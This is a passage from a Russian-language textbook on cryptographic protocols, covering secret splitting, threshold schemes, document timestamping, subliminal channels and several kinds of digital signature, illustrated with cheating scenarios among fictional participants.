Недостаток рассмотренной схемы — необходимо точно указывать имена абонентов, которым предназначено рассылаемое сообщение, чтобы не заставлять всех остальных абонентов сети связи лихорадочно перебирать имеющиеся у них ключи в поисках того, который позволит им правильно прочесть принятое шифрованное сообщение. Не нужно доказывать, что при определенных условиях раскрытие этих имен перед злоумышленниками может быть весьма нежелательным.

8. Распределение ответственности

Распределение ответственности

Предположим, что вы собираетесь в отпуск. Ваш шеф попросил, чтобы вы сообщили пароль со своего компьютера кому-либо из коллег. Однако вы не можете полностью переложить ответственность за сохранность своих ценных данных ни на одного из товарищей по работе. В этой ситуации вам следует подумать о распределении ответственности.

Существует возможность разделить секретное сообщение на части, каждая из которых не имеет никакого смысла, но если их определенным образом соединить вместе, снова получится исходное сообщение. Таким образом вы сможете поделить свой пароль на части и, уходя в отпуск, оставить каждому из коллег по одной его части, чтобы, только собравшись все вместе, они оказались в состоянии запустить ваш компьютер. Сделать это в одиночку из них не сможет никто.

Простейший криптографический протокол позволяет Дмитрию поровну распределить между Антоном и Борисом ответственность за сохранение сообщения в тайне:

1. Дмитрий генерирует случайную битовую строку R, которая имеет ту же длину, что и исходное сообщение М.

2. Дмитрий складывает М с R по модулю 2 и получает S.

3. Дмитрий вручает R Антону, a S — Борису.

Чтобы восстановить сообщение М в исходном виде, Антон и Борис должны совместно выполнить последний шаг протокола:

1. Антон и Борис складывают R и S по модулю 2 и получают М.

В умелых руках данный протокол является весьма надежным. Знание S или R не позволяет реконструировать М. Дмитрий шифрует сообщение при помощи одноразового блокнота и отдает полученный в результате шифртекст одному человеку, а сам блокнот — другому.

Этот протокол можно легко применять для любого числа участников. Если участников 4, он будет выглядеть следующим образом:

1. Дмитрий генерирует три случайных битовых строки R, S и Т, которые имеют ту же длину, что и исходное сообщение М.

2. Дмитрий складывает М, R, S и Т по модулю 2 и получает U.

3. Дмитрий вручает R Антону, S — Борису, Т — Владимиру, U — Георгию.

Чтобы восстановить сообщение М в исходном виде, Антон, Борис, Владимир и Георгий должны совместно выполнить последний шаг протокола:

1. Антон, Борис, Владимир и Георгий складывают R, S, Т и U по модулю 2 и получают М.

Одним из участников протокола является Дмитрий, который наделен неограниченными правами. Например, Дмитрий может зашифровать какую-нибудь абракадабру вместо М, а потом утверждать, что Антон и другие участники протокола являются хранителями настоящей тайны, а не какой-то чепухи. Чтобы разоблачить Дмитрия, им необходимо собраться вместе и восстановить исходное сообщение. А еще Дмитрий может сначала раздать части своего сообщения Антону, Борису, Владимиру и Георгию, а затем сложить М и U по модулю 2 и заявить, что только Антон, Борис и Владимир нужны для восстановления сообщения в исходном виде, а от Георгия можно избавиться. Поскольку сообщение М всецело принадлежит только Дмитрию, он может распоряжаться им, как того пожелает.

Основной недостаток криптографического протокола, распределяющего ответственность за сохранение сообщения в тайне, состоит в том, что если хотя бы один из его участников потеряет доверенную ему часть, будет также безвозвратно утрачено и само сообщение. Если, конечно, Дмитрий не помнит его наизусть. В результате в распоряжении участников протокола останется только длина исходного сообщения. Но вряд ли они захотят довольствоваться только этим.

Существуют ситуации, в которых необходимо уметь восстанавливать секретное сообщение даже в отсутствие некоторых участников протокола. Например, вы пишете программу для управления запуском межконтинентальных ракет. Естественно, вы хотите сделать так, чтобы если офицер, имеющий доступ к "ядерной кнопке", сойдет с ума и захочет уничтожить какой-либо континент, у него это ни в коем случае не получится. У "ядерной кнопки" должны собраться вместе по меньшей мере пятеро сумасшедших офицеров, чтобы с помощью вашей программы стереть в порошок Америку.

Ситуацию можно еще усложнить. Допустим, что для нажатия "ядерной кнопки" в нашей стране нужны 1 генерал и 3 полковника. А если генерал по причине своего старческого склероза, забыл приехать к "ядерной кнопке" в назначенное время, достаточно и пятерых полковников. При этом, если собрались всего 4 полковника, Америке ничего не грозит до тех пор, пока 5 полковников не окажутся в полном сборе. Или пока генерал не приедет.

Криптологи придумали так называемый пороговый протокол, который позволяет распределять ответственность даже еще более сложным образом. В общем случае берется любое секретное сообщение (пароль, код запуска баллистических ракет, рецепт приготовления "Кока-колы") и делится па n частей (называемых долями) так, что для реконструкции исходного сообщения обязательно нужны m из них. Такой протокол более точно именуется ( т, п ) - пороговым протоколом.

Например, при использовании (3,4)-порогового протокола Дмитрий может поделить между Антоном, Борисом, Владимиром и Георгием секретный пароль для включения своего персонального компьютера таким образом, что трое из них, собравшись вместе, будут в состоянии восстановить этот пароль и включить компьютер Дмитрия. Если Владимир неожиданно попадет в больницу в бессознательном состоянии, то же самое смогут сделать Антон, Борис и Георгий. Однако, если Борис в это время будет в командировке, без него Антон и Георгий так и не смогут запустить компьютер Дмитрия.

Существует множество способов мошенничества со стороны как участников порогового протокола, распределяющего между ними ответственность за  хранение тайны, так и посторонних лиц. Для примера рассмотрим три сценария такого мошенничества:

1. Антон, Борис, Владимир и Георгий получают от шефа приказ включить персональный компьютер Дмитрия. Все четверо собираются вместе и выполняют операцию сложения имеющихся у них долей по модулю 2. Однако Георгий, которого подкупила конкурирующая фирма, вместо того чтобы честно прибавить свою долю, выданную ему Дмитрием, прибавляет случайную битовую строку. В результате компьютер Дмитрия отказывается включаться, и никто не может объяснить, в чем тут дело.

2. К Антону, Борису, Владимиру и Георгию, получившим от шефа распоряжение включить персональный компьютер Дмитрия, присоединяется Зиновий, который утверждает, что он явился по приказу шефа для воссоздания пароля, поскольку якобы является законным обладателем соответствующей пятой доли. После того как ничего не подозревающие Антон, Борис, Владимир и Георгий огласили свои доли, Зиновий с торжествующем воплем убегает из комнаты: теперь он может в одиночку реконструировать пароль Дмитрия, т. к. знает все необходимые для этого доли.

3. Вместо того чтобы убежать, Зиновий дожидается, пока все участники протокола по очереди огласят свои доли, а затем называет случайную битовую строку требуемой длины. В этом случае Зиновий не только сумеет узнать все доли, но и никто из участников протокола так и не осознает. что Зиновий является посторонним лицом и не имеет никакого права присутствовать при восстановлении секретного пароля Дмитрия.

Для предотвращения мошенничества можно соответствующим образом усовершенствовать пороговый протокол, однако подробное описание этих усовершенствований выходит за рамки данной книги. Поэтому просто перечислим некоторые из них.

  • Можно обойтись без Дмитрия, который делит исходное секретное сообщение на части. В этом случае никто из участников протокола не знает содержание сообщения до тех пор, пока все они не соберутся вместе и не реконструируют его.
  • От участников протокола не требуется оглашать свою долю публично. Если секретом является тайный ключ в криптосистеме с открытым ключом, которая используется для цифровой подписи, каждый участник выполняет частичное (долевое) подписание соответствующего документа. После того как это сделает последний из них, под документом появится полная цифровая подпись. При этом ни один из участников так и не узнает долю другого.
  • Участники протокола могут убедиться, что на самом деле получили от Дмитрия настоящую долю, позволяющую им принимать участие в реконструкции секретного сообщения наравне с другими участниками протокола. При этом от участников совершенно не требуется собираться вместе и восстанавливать исходное сообщение.
  • Можно устроить так, что если более m участников протокола высказались за реконструкцию секретного сообщения и при этом менее n участников были против, сообщение будет восстановлено в первозданном виде, а иначе — не будет.
  • Можно добиться, чтобы в случае, если один из участников протокола окажется не в состоянии выполнить необходимые действия для восстановления исходного секретного сообщения, почти мгновенно и без каких-либо существенных накладных расходов будет введен новый протокол, участниками которого станут оставшиеся участники первоначального.

9. Вспомогательные криптографические протоколы

Вспомогательные криптографические протоколы

Отметка о времени создания файла

Существует немало ситуаций, когда людям приходится доказывать, что некий документ уже существовал в определенный момент времени. Например, в споре об авторском праве на изобретение побеждает тот, кто предъявит самую раннюю копию описания сути этого изобретения. Если соответствующая документация оформляется на бумаге, заверенную нотариусом копию документа можно передать на хранение в нотариальную контору. При возникновении конфликта нотариус или другой полномочный представитель юридической конторы засвидетельствует существование документа в определенный момент времени.

В компьютерном мире все значительно сложнее. Файл, в котором хранится документ, может быть скопирован и изменен бессчетное число раз. А поменять отметку о времени последней модификации этого файла по силам даже начинающему пользователю. И никто не сможет просто взглянуть на файл и сказать: "Да, я абсолютно уверен, что данный файл был создан именно 15 марта 1996 г." Необходимо пользоваться специальным криптографическим протоколом, который обладает следующими свойствами:

  • файл снабжается отметкой о времени его создания, и эта отметка является неотъемлемой частью файла вне зависимости от физического носителя, используемого для его хранения;
  • в файл нельзя внести какие-либо изменения так, чтобы эти изменения остались незамеченными;
  • имеющуюся отметку о времени создания файла невозможно поменять на другую.

Отметка о времени создания файла и арбитраж

Файл можно снабдить отметкой о времени его создания при помощи протокола, в котором принимает участие доверенное лицо (Дмитрий):

1. Антон передает копию своего документа Дмитрию.

2. Дмитрий фиксирует время получения копии документа, которую с этого момента хранит у себя, чтобы предъявить по первому требованию Антона.

Теперь при возникновении разногласий относительно времени создания документа Антон обращается к Дмитрию, который демонстрирует копию документа и дает свидетельские показания о том, когда этот документ был им получен.

Данный протокол позволяет добиться желаемой цели, однако имеет ряд существенных недостатков, связанных с тем, что Антон должен отдать копию своего документа на хранение Дмитрию.

О Любой, кто способен перехватывать информацию, передаваемую Антоном по каналам связи, сможет прочесть этот документ. Даже если Антон шифрует все свои сообщения, его документ скорее всего попадет в компьютерную базу данных Дмитрия. Антону остается только надеяться, что Дмитрий достаточно ответственно относится к защите переданных ему на хранение документов от посягательств посторонних лиц.

  • При большом числе клиентов требования к объемам хранимых у Дмитрия данных возрастут неимоверно. То же касается и пропускной способности каналов связи, соединяющих Дмитрия с его клиентами.
  • Ошибка при передаче документа на хранение Дмитрию или сбой и его компьютере сведут на нет способность Антона доказать, что этот документ уже существовал в определенный момент времени.
  • У Антона могут возникнуть проблемы, когда он попытается найти доверенное лицо, столь же честное, как и неподкупный Дмитрий из описанного выше протокола с арбитражем. И тогда у отчаявшегося Антона вполне может возникнуть непреодолимое желание сговориться с нечистым на руку арбитром и поставить на документ фальшивую отметку о времени его создания.

Чтобы избавиться если не от всех, то хотя бы от большинства перечисленных недостатков, можно прибегнуть к помощи однонаправленных функции:

1. Антон вычисляет хэш-значение для своего документа.

2. Антон передает вычисленное хэш-значение Дмитрию.

3. Дмитрий добавляет к этому хэш-значению отметку о времени его получения и ставит свою цифровую подпись под итоговым документом.

4. Дмитрий отсылает подписанное им хэш-значение с проставленной отметкой времени обратно Антону.

Теперь Антону нечего беспокоиться о том, достаточно ли надежно хранит Дмитрий доверенные ему документы. Дмитрию вообще не надо ничего держать в своей базе данных, и, следовательно, сами собой отпадают проблемы. связанные с хранением огромных объемов информации. Антон может сразу проверить полученный от Дмитрия итоговый документ на предмет наличия в нем искажений, внесенных при передаче по каналам связи. Однако по-прежнему нерешенной остается проблема сговора между Антоном и Дмитрием с целью снабдить документ нужной отметкой о времени его создания.

Связующий протокол

Вряд ли Антон является единственным клиентом Дмитрия. Скорее всего. Дмитрий уже ставил отметки о времени создания на документы других людей, прежде чем с аналогичной просьбой к нему обратился Антон. А это значит, что отметке о времени создания документа Антона предшествует какая-то отметка, внесенная в документ другого человека. Более того, разумно предположить, что в скором времени к Дмитрию поступят и другие документы, которые потребуется снабдить отметкой о времени создания.

Пусть А— это идентификатор Антона, присвоенный ему в компьютерной сети, Н n — хэш-значение документа, для которого Антон хочет получить отметку о времени создания, a T n -1 — отметка о времени создания предыдущего документа. Тогда, чтобы затруднить сговор между Антоном и Дмитрием, можно воспользоваться так называемым связующим протоколом:

1. Антон посылает Дмитрию Н n и А.

2. Дмитрий отсылает обратно Антону T n = S K (n,A,H n ,T n ,I n -1 ,H n-1 ,T n-1 ,L n ), где L n представляет собой следующую связующую информацию, подвергнутую хэшированию при помощи функции Н вида L n = H(I n -1 ,H n-1 ,T n-1 ,L n -1 ). Здесь наличие S К свидетельствует о том, что сообщение подписано цифровой подписью Дмитрия. Присутствие А необходимо, чтобы идентифицировать Антона в качестве получателя этого сообщения. Параметр n задает порядковый номер отметки о времени создания документа, хэш-значение которого Дмитрий получил от Антона. Т n — это сама отметка о времени. Остальные параметры перечисляют идентификатор хэш-значение, отметку времени и связующую информацию, которые были вычислены для предыдущего документа, присланного Дмитрию для постановки отметки о времени создания.

3. После того как Дмитрий получит следующий документ, на который потребуется поставить отметку о времени создания, он перешлет Антону идентификатор I n+ 1 своего очередного клиента, приславшего этот документ.

Теперь, если кто-то поставит под сомнение время создания документа Антоном, он может связаться с I n -1 и I n +1 , т. е. с авторами предыдущего и следующего документов, присланных Дмитрию. Если и у них возникнут сомнения относительно времени создания документов, то они. в свою очередь, могут обратиться к I n - 2 и I n + 2 . Каждый из них может доказать, что на его документ была поставлена отметка времени, предшествующая отметке следующего клиента и идущая за отметкой предыдущего.

Связующий протокол значительно осложняет сговор между Антоном и Дмитрием. Дмитрий не сможет перенести отметку о времени создания документа в будущее, поскольку тогда от него потребуется умение это будущее предсказывать — он должен точно знать, какой именно документ будет прислан непосредственно перед этим моментом времени. Точно так же Дмитрий будет не в состоянии сделать отметку о времени создания документа более ранней, чем это есть на самом деле: она должна быть встроена во временную отметку следующего документа, а на этот документ соответствующая отметка уже поставлена. У Антона и Дмитрия остается единственная возможность смошенничать: они могут породить цепочку фиктивных документов до и после документа Антона, причем эта цепочка должна быть настолько длинной, чтобы у проверяющего не хватило терпения изучить ее до самого конца.

Распределенный протокол

Люди не вечны. Поэтому вполне может случиться так, что когда Антон обратится за содействием к I n -1 , тот уже успеет отправиться в мир иной, где отметки о времени создания документов вовсе не так важны для его обитателей. В этом случае можно посоветовать Антону воспользоваться распределенным протоколом и встроить в отметку о времени создания своего документа временные отметки, по крайней мере, 10-и других человек. Таким образом, у Антона будет больше шансов найти людей, которые при необходимости смогут помочь удостоверить время создания его документа. Распределенный протокол также позволяет избавиться от услуг Дмитрия:

1. С помощью генератора криптографически надежной псевдослучайной последовательности Антон получает k чисел R 1 , R 2 , . . . , R k , в качестве начального значения используя хэш-значение Н n , вычисленное для своего документа,.

2. Антон интерпретирует сгенерированные числа R 1 , R 2 , . . . , R k , как идентификаторы абонентов компьютерной сети, и отсылает Нп каждому из них.

3. Все выбранные Антоном абоненты сети добавляют к хэш-значению Н n отметку о времени его получения, подписывают итоговое сообщение своей цифровой подписью и отсылают обратно Антону.

4. Антон собирает и хранит все k подписей вместе с отметкой о времени создания своего документа.

Криптографически надежный генератор псевдослучайных чисел необходим для того, чтобы Антон не смог повлиять на выбор идентификаторов и, тем самым, подобрать людей, с которыми он в состоянии вступить в сговор. Даже если Антон попытается соответствующим образом изменить свои документ, чтобы получить по нему такое хэш-значение, которое позволило бы сгенерировать необходимый Антону набор идентификаторов, его шансы преуспеть в этом занятии будут ничтожны.

Антон может смошенничать, только убедив всех без исключения k участников протокола вступить с ним в сговор. Поскольку эти участники выбираются наугад, вряд ли у Антона что-нибудь получится, Однако чем более коррумпированным является общество, тем больше должно быть значение k.

Дополнительно придется позаботиться о том, как поступать с людьми, которые вовремя не отреагируют на просьбу Антона подписать высланное им хэш-значение. Вероятнее всего, для официального признания правильности отметки о времени создания документа от Антона потребуется собрать не , менее К подписей, где значение К фиксируется в законодательном порядке.

Подсознательный канал

Предположим, что Антон и Борис были арестованы и препровождены в тюрьму. Их тюремный охранник Олег не возражает против того, чтобы они обменивались сообщениями, но при одном условии: эти сообщения не должны быть зашифрованы. Вдруг Антон и Борис захотят разработать план совместного побега! Поэтому Олег желает читать все, что Антон и Борис сообщают друг другу.

А еще Олег надеется обмануть Антона, договорившись с Борисом, и в удобный момент подменить настоящее сообщение от одного из них другому на фальшивое. Антону и Борису ничего не остается, как воспользоваться услугами Олега. Ведь иначе они не смогут общаться друг с другом и координировать свои планы. Поэтому Антону и Борису придется организовать между собой так называемый подсознательный канал. Пользуясь этим каналом, они смогут передавать секретную информацию, а Олег, который будет читать псе их сообщения, так ничего и не заподозрит.

Простым подсознательным каналом может служить число слов в предложениях невинного на первый взгляд текста. Нечетное количество слов соответствует 0, а четное — 1. Таким образом, если мой сообщник подсчитает количество слов в предложениях предыдущего абзаца, то получит секретное сообщение "11010". К сожалению, в этом алгоритме отсутствует ключ, а сам алгоритм является ограниченным — здесь стойкость всецело зависит от сохранения в тайне самого алгоритма.

Американский криптолог Г. Симмонс (G. Simmons) первым сумел встроить подсознательный канал в обыкновенную цифровую подпись. В этом случае алгоритм цифровой подписи со встроенным подсознательным каналом б\-дет неотличим для Олега от стандартного алгоритма цифровой подписи. Олег не только не сможет читать сообщения, передаваемые Антоном и Борисом по подсознательному каналу. В его мозгу не мелькнет даже намека па мысль о возможном существовании такового.

Протокол, придуманный Симмонсом для реализации подсознательного канала с помощью цифровой подписи, в общих чертах выглядит так:

1. Антон генерирует произвольное сообщение, выглядящее вполне невинно.

2. При помощи секретного ключа, который имеется и у Бориса, Антон подписывает свое сообщение так, что в подписи прячется подсознательный канал.

3. Антон отдает подписанное сообщение Олегу.

4. Олег знакомится с сообщением Антона, проверяет цифровую подпись. Не обнаружив ничего подозрительного, Олег передает это сообщение Борису.

5. Борис проверяет цифровую подпись Антона под полученным из рук Олега сообщением и убеждается, что оно пришло от Антона.

6. Используя секретный ключ, которым он владеет совместно с Антоном, Борис извлекает секретную информацию, содержащуюся в подсознательном канале.

Что касается надежд Олега подсунуть одному из "друзей по переписке", томящихся в тюрьме, фальшивое сообщение, якобы исходящее от другого, то им не суждено сбыться. Дело в том, что Олег не сможет сгенерировать подлинную цифровую подпись Антона и, следовательно, не в состоянии послать фальшивую информацию по подсознательному каналу. А поскольку у Олега нет секретного ключа, совместно используемого Антоном и Борисом, то он не сможет прочесть ни одного сообщения, которыми они обмениваются. Сообщения, под которыми стоит обыкновенная цифровая подпись, для Олега ничем не отличаются от сообщений с цифровой подписью со встроенным в нее подсознательным каналом.

К сожалению, в некоторых алгоритмах подсознательный канал устроен таким образом, что секретная информация, необходимая Борису, чтобы читать сообщения Антона, совпадает с секретной информацией, имеющейся у Антона и позволяющей ему посылать невинно выглядящие сообщения Борису. В этом случае ничто не может помешать Борису перевоплотиться в Антона и посылать фальшивые сообщения, якобы исходящие от его имени. Однако имеется ряд других алгоритмов, свободных от этого недостатка. В них секретный ключ, находящийся в распоряжении Антона, отличается от ключа, которым пользуется Борис, и, следовательно, Антону не приходится опасаться злоупотреблений со стороны Бориса.

Практическое применение подсознательного канала

На практике подсознательный канал наиболее подходит для организации связи в шпионских сетях. Если в стране, куда заслан шпион, почти все ее граждане регулярно посылают и получают электронные сообщения, снабженные цифровой подписью, то, совершенно не рискуя попасть под подозрение, он может подписывать свои невинно выглядящие сообщения с помощью цифровой подписи, в которую встроен подсознательный канал для передачи шпионских посланий.

Другие области практического применения подсознательного канала менее очевидны. Используя подсознательный канал, Антон может подписан, документ под угрозой физической расправы, вставив в него секретное сообщение вида "Меня заставили поставить эту подпись", чтобы иметь возможность впоследствии ее оспорить. Правоохранительные органы мот наносить специальную маркировку на электронную наличность, чтобы отслеживать ее движение. Офисная программа, с помощью которой ставится электронная подпись под документами компании, может иметь двойное назначение и дополнительно использоваться для передачи коммерческих секретов конкурентам.

Подобных возможностей — масса, и поэтому, чтобы воспрепятствовать злонамеренному использованию цифровой подписи для организации подсознательного канала связи, были разработаны специальные алгоритмы, которые не могут быть модифицированы с целью встраивания в них подсознательного канала.

10. Неоспоримая цифровая подпись

Довольно легко получить точную копию обычной цифровой подписи. Иногда это приходится очень кстати, особенно если цифровая подпись стоит под объявлением, предназначенным для всеобщего ознакомления. Однако свободно циркулирующее личное или деловое письмо, в подлинности которого в состоянии убедиться всякий, может поставить его автора в довольно неловкое положение, не говоря уже об опасности прямого шантажа. Поэтому лучше применять такую цифровую подпись, которую можно проверить, но нельзя продемонстрировать посторонним лицам без согласия ее владельца.

Предположим, что Антон возглавляет компанию "ПрограммКомп", которая торгует универсальным текстовым редактором "УниЛекс'97" собственного изготовления. Чтобы исключить заражение компьютерным вирусом машин. принадлежащих покупателям этого программного продукта, "ПрограммКомп" снабжает каждую копию "УниЛекса'97" цифровой подписью. Однако необходимо, чтобы только легальные покупатели "УниЛекса'97" могли проверить подлинность цифровой подписи. Если в купленной на законных основаниях копии "УниЛекса'97" вдруг обнаружится вирус, "ПрограммКомп" не сможет оспорить подлинность своей цифровой подписи.

Для этого "ПрограммКомп" должна воспользоваться неоспоримой цифровой подписью. Подобно обыкновенной цифровой подписи, неоспоримая подпись определяется содержанием подписанного документа и зависит от тайного ключа ее автора. Основное отличие неоспоримой цифровой подписи ел обыкновенной состоит в том, что неоспоримую подпись нельзя проверить без согласия поставившего ее человека. С этой точки зрения ее лучше было бы назвать "подписью без права передачи". Тем не менее, свое название неоспоримая цифровая подпись получила благодаря другому своему свойству: если Антон будет вынужден либо признать подлинность предъявленной ему неоспоримой цифровой подписи, либо отвергнуть ее, то он не сможет отказаться от нее в случае, если эта подпись является настоящей.

Математический аппарат, используемый для конструирования неоспоримой цифровой подписи, довольно сложен и громоздок, однако основная идея соответствующего протокола достаточно прозрачна:

1. Антон знакомит Бориса со своей цифровой подписью.

2. Борис генерирует случайное число и передает его в распоряжение Антона.

3. На основе полученного от Бориса случайного числа и собственного тайного ключа Антон выполняет специальные вычисления, результат которых отсылает обратно Борису. Антон может сделать это только в том случае, если цифровая подпись является подлинной.

4. Борис подтверждает получение вычисленного Антоном значения.

С помощью дополнительных математических ухищрений можно добиться. чтобы Антон мог доказать, что он не подписывал документ, авторство подписи под которым необоснованно приписывается ему, и не смог "отвертеться", если подпись действительно принадлежит ему.

Один из недостатков протокола, позволяющего ставить неоспоримую цифровую подпись под документом, состоит в том, что Борис не в состоянии убедить третьего участника этого протокола (Владимира) в подлинности Цифровой подписи Антона. А все потому, что Владимир не имеет возможности удостовериться, насколько случайно число, сгенерированное Борисом на шаге 2. С таким же успехом Борис мог выполнить все шаги протокола в обратном порядке без участия Антона, а затем продемонстрировать Владимиру полученный результат. Владимиру необходимо принять участие во всех шагах протокола самому (вместо Бориса), чтобы проверить 100-процентную подлинность цифровой подписи Антона.

В результате Борис может на законных основаниях приобрести копию "УниЛекса'97", сделать с нее пиратскую копию и перепродать Владимиру. Как только Владимир захочет проверить подлинность цифровой подписи под пиратской копией "УниЛекса'97", Борис обратится к Антону с просьбой произвести проверку подписи под купленной легально копией этого текстового редактора. Сгенерированное Владимиром случайное число Борис переадресует Антону, а поступивший от Антона ответ он перешлет Владимиру.

Но даже с учетом присущих ей изъянов неоспоримая цифровая подпись может быть с успехом использована там, где Антону не требуется, чтобы кто-либо имел возможность проверять эту подпись бесконтрольно. Например, если Антон продал конфиденциальную информацию, заверенную с помощью неоспоримой цифровой подписи, то с его стороны вполне естественно потребовать, чтобы только покупатель этой информации мог проверить подлинность подписи Антона.

11. Цифровая подпись с назначенным конфирмантом

Если дела у компании "ПрограммКомп" резко пойдут в гору и "УниЛекс'97" станут покупать нарасхват, то Антону вскоре придется заниматься одной только проверкой подлинности цифровых подписей на проданных копиях вместо того, чтобы готовить к выпуску новую, более универсальную, версию своего текстового редактора. Поэтому Антон вряд ли откажется, если ему Борис предложит стать его конфирмантом, т. е. взять на себя верификацию подписей Антона. Для этого Антон просто будет ставить под копиями "УниЛекса'97" не обыкновенную цифровую подпись, а цифровую подпись с назначенным конфирмантом.

В результате Антон сможет переложить ответственность за проверку подлинности своей цифровой подписи целиком на Бориса, причем даже без его предварительного согласия, не дожидаясь, пока тот сам предложит свои услуги. Для этого Антону достаточно будет просто воспользоваться открытым ключом Бориса. В случае отсутствия Антона по причине командировки в другой город, приступа желчно-каменной болезни или даже безвременной кончины, Борис все равно будет в состоянии в любой момент времени проверить подлинность подписи Антона.

Цифровая подпись с назначенным конфирмантом позволяет найти разумный компромисс между обычной и неоспоримой подписями. С одной стороны, вполне понятно стремление Антона ограничить круг людей, которые могут проверить подлинность его цифровой подписи. С другой стороны, у Антона открываются слишком широкие возможности для злоупотреблений. Например, он может отказаться сотрудничать с кем бы то ни было, просто заявив, что потерял ключи, необходимые для проверки своей цифровой подписи. В этом случае заранее назначенный Антоном конфирмант (Борис) заменит Антона в его отсутствие и произведет все требуемые действия.

Цифровая подпись с назначенным конфирмантом может оказаться полезной не только для компании, торгующей программным обеспечением. Если Борис поместит свой открытый ключ в общедоступный справочник, то его услугами в качестве назначенного конфирманта сможет воспользоваться любой, кто в них нуждается. Взимая небольшую плату за проверку каждой цифровой подписи, Борис сможет обеспечить себе безбедную старость.

12. Цифровая подпись по доверенности

Кроме проверки своей цифровой подписи, Антон может поручить другому лицу ставить эту подпись вместо себя. В жизни случается всякое, и Антон не застрахован от несчастного случая. Или, например, попытка продать текстовый редактор "УниЛекс'97" якутским оленеводам может потребовать от Антона посещения районов, в которых компьютерные сети — все еще большая редкость. Каким же образом Антон может передать Борису право подписывать все документы вместо себя, не предоставляя ему доступ к своему тайному ключу?

Для этого Антону следует воспользоваться цифровой подписью по доверенности. Тогда в случае необходимости Антон сможет передать Борису доверенность на право ставить свою цифровую подпись. Для этого поставленная по доверенности цифровая подпись должна обеспечивать:


  • Распознаваемость.
Подпись по доверенности всегда можно отличить от оригинальной подписи ее настоящего владельца.

  • Невозможность фальсификации. Только истинный владелец подписи и его доверенное лицо в состоянии поставить эту подпись под документом.
  • Проверяемость. Изучение цифровой подписи, поставленной по доверенности, позволяет убедиться, что ее владелец действительно предоставил эту доверенность лицу, поставившему данную подпись.
  • Опознаваемость. Цифровая подпись по доверенности дает возможность ее владельцу однозначно идентифицировать человека, который поставил эту подпись.
  • Неоспоримость. Цифровая подпись по доверенности, поставленная под документом, не может быть впоследствии оспорена лицом, на законных основаниях поставившим ее под этим документом.
  • В некоторых случаях требуется, чтобы возможность однозначно идентифицировать лицо, поставившее цифровую подпись по доверенности, была предоставлена не только законному владельцу подписи, но и любому, кто пожелает это сделать.

    13. Групповые подписи

    Групповыми подписями называются цифровые подписи, которые обладают следующими свойствами:

    • только члены группы могут подписывать документы;
    • владелец документа может убедиться, действительно ли поставленная под этим документом подпись принадлежит одному из членов группы:
    • по подписи невозможно определить, кто именно из членов группы ее поставил;
    • в случае возникновения разногласий имеется возможность однозначно идентифицировать члена группы, которому принадлежит та или иная подпись.

    Поставить групповую подпись под документом можно, например. мощи следующего протокола с арбитражем:

    1. Дмитрий генерирует большое количество пар ключей, состоящих из  открытого и соответствующего ему тайного ключа. Каждый член группы получает от Дмитрия свой набор тайных ключей. При этом никакой тайный ключ из одного набора не повторяется в другом.

    2. Дмитрий в случайном порядке помещает все открытые ключи в общедоступную базу данных, сохраняя в секрете от посторонних информацию о том, кому из членов группы принадлежит каждый из этих ключей.

    3. Чтобы подписать документ, член группы выбирает ключ из списка, предоставленного ему Дмитрием.

    4. Чтобы проверить подлинность групповой подписи, достаточно воспользоваться соответствующим открытым ключом, обратившись за ним в базу данных.

    5. В случае возникновения спора Дмитрий знает, кому из членов группы принадлежит ключ, с помощью которого была поставлена подпись, вызвавшая разногласия.

    Недостатком данного протокола является наличие арбитра, который знает все секретные ключи и может подделать любую подпись. Кроме того, сгенерированное Дмитрием множество пар ключей должно быть очень большим, чтобы воспрепятствовать попыткам выяснить, какой из ключей кому принадлежит.

    14. Цифровая подпись с дополнительной защитой

    Предположим, что в распоряжении злоумышленника Зиновия имеется множество высокопроизводительных компьютеров. И все они работают днем и ночью, чтобы вскрыть тайный ключ Антона, которым тот попытается, подписывая своей цифровой подписью важные финансовые документы. Цель оправдывает средства: ведь в случае успеха Зиновий сможет свободно распоряжаться весьма значительными денежными средствами Антона, подделывая его подпись.

    Чтобы противостоять злодейским планам Зиновия, Антону следует воспользоваться цифровой подписью с дополнительной защитой. Тогда, если Зиновии вскроет тайный ключ Антона с помощью тотального перебора и подделает его подпись, Антон сможет разоблачить подделку. Идея, которая лежит в основе цифровой подписи с дополнительной зашитой, достаточно проста. Каждому открытому ключу ставится в соответствие не один тайный ключ, а некоторое множество тайных ключей. Любой из них позволяет поставить под документом цифровую подпись, но она будет отлична от подписей, изготовленных при помощи других ключей. Антон знает только один ключ, остальные ему неизвестны.

    Теперь, если Зиновий накопит достаточно документов, подписанных Антоном, и попробует использовать всю мощь своих компьютеров для нахождения тайного ключа Антона, то самое большее, чего сможет добиться Зиновий, — это отыскание отдельного ключа. А если количество возможных тайных ключей, соответствующих данному открытому ключу, чрезвычайно велико, то Зиновий вряд ли найдет именно тот ключ, который использует Антон для подписи своих документов.

    Если Зиновий попытается подделать подпись Антона, воспользовавшись тайным ключом, вскрытым тотальным перебором, то эта подделка будет заметно отличаться от настоящей подписи Антона. И когда дело дойдет до суда, Антон сможет продемонстрировать, что с помощью его собственного ключа получается совсем другая подпись, чем та, которую обманным путем воспроизвел Зиновий. Однако в случае, если Антон окажется не в состоянии доказать суду существование двух различных подписей, это будет означать, что подпись под спорным документом является подлинной.

    Таким образом, цифровая подпись с дополнительной защитой позволяет отразить атаку, предпринятую Зиновием, имеющим в своем распоряжении самые современные суперкомпьютеры. Но с бандитом, который проникнет в квартиру Антона и украдет его тайный ключ, или с самим Антоном, подписавшим документ и потом сделавшим вид, что потерял ключ, ничего не сможет поделать даже самая изощренная схема цифровой подписи с дополнительной защитой. В первом случае остается только посоветовать установить более совершенную сигнализацию или обзавестись сторожевой собакой. А во втором — тщательнее выбирать себе деловых партнеров.

    15. Предсказание бита

    Непревзойденный маг и волшебник Антон решает публично продемонстрировать свои необычайные интеллектуальные способности. Он точно знает. какую карту выберет из колоды Борис еще до того, как это сделает сам Борис! Поэтому Антон записывает название этой карты на листке бумаги, кладет листок в конверт и запечатывает его. Затем Антон передает запечатанный конверт на хранение кому-то из публики. "Возьми из колоды любую карту", — предлагает Антон Борису. Борис выбирает наугад карту и показывает зрителям: "Туз пик". Антон вскрывает конверт и извлекает из него листок бумаги, на котором, как все могут убедиться, черным по белому написано: "Туз пик". Шквал аплодисментов.

    Но как узнать наверняка, что Антон не подменил конверт, прежде чем его вскрыть? Специальный криптографический протокол позволяет Антону сохранить предсказанное им значение, состоящее из одного пли нескольких битов, в тайне до тех пор, пока он не пожелает ознакомить с ним остальных. С другой стороны, следуя данному протоколу, Борис сможет удостовериться, что Антон не смошенничал и не изменил свой выбор уже после того, как этот выбор был им сделан.

